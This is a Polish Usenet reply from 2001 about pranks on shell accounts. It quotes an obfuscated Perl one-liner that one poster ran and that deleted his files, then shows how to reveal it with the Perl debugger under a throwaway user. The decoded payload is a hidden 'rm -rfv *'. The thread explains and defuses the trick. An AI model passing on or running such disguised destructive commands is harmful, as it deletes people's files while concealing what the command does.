Re: konto shellowe - wilcza przysluga ????

Autor: Tomasz Dymek (tomek_at_-remove-this-rabarbar.eu.org)
Data: Thu 22 Feb 2001 - 23:12:13 MET

On Wed, 21 Feb 2001, Andrzej Dopierała said:

> W dniu 20 Feb 2001 22:53:10 +0100,
> przez Tomasz Dymek zostało popełnione co następuje:

> bash-2.04$ perl -e 's$$7=78)1~61\@A6*:\@?~$*y+A~@%-?B+\-" a-z*+/s^^$_^ee'
> usuwam wszystkie pliki katalogu `GNUstep'
> usuwam wszystkie pliki katalogu `GNUstep/Defaults'
> [..]
> O ku...

>:->

> jest jakiś debugger do perla? Bo ja za cholere nie wiem jak sprawdzić co to
> robi bez uruchomienia... :/

(tomek_at_dixie) 23:08:29
~ $ su - heniek
Password:
heniek_at_dixie:~$ perl -d -e 's$$7=78)1~61\@A6*:\@?~$*y+A~@%-?B+\-" a-z*+/s^^$_^ee'
Default die handler restored.

Editor support available.

Enter h or `h h' for help, or `man perldebug' for more help.

main::(-e:1): s$$7=78)1~61\@A6*:\@?~$*y+A~@%-?B+\-" a-z*+/s^^$_^ee
  DB<1> n
main::(-e:1): s$$7=78)1~61\@A6*:\@?~$*y+A~@%-?B+\-" a-z*+/s^^$_^ee
  DB<1> n
main::((eval 4)[-e:1]:1): system"rm -rfv *"
  DB<1>

 -d uruchamia debuger

--
                                                                   * Tomek.